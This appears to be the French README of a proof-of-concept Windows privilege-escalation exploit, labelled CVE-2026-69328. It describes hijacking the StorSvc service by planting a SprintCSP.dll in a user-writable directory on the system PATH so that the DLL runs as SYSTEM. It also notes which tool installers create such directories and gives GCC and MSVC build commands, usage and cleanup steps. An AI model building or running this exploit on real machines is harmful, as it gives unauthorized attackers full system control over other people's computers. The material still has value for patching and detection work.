
Exploit d'élévation de privilèges Windows qui place SprintCSP.dll dans un répertoire HKLM PATH accessible en écriture par l'utilisateur afin de détourner StorSvc et d'exécuter en tant que SYSTEM.
StorSvc charge SprintCSP.dll par nom relatif en tant que SYSTEM. Placez-le dans un répertoire HKLM PATH accessible en écriture par l'utilisateur, obtenez SYSTEM.
Nécessite un répertoire accessible en écriture par l'utilisateur dans HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path.
Aucun sur une image propre. Les installateurs d'outils en ajoutent (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts). Si la machine n'en a aucun, CVE-2026-69328.exe --setup en crée un, ce qui nécessite une invite administrateur unique. L'exploit lui-même n'a jamais besoin d'admin.
GCC :
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC :
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
La preuve se trouve à C:\Windows\System32\CVE-2026-69328.txt.
StorSvc plante après le chargement et SCM le redémarre après ~120s.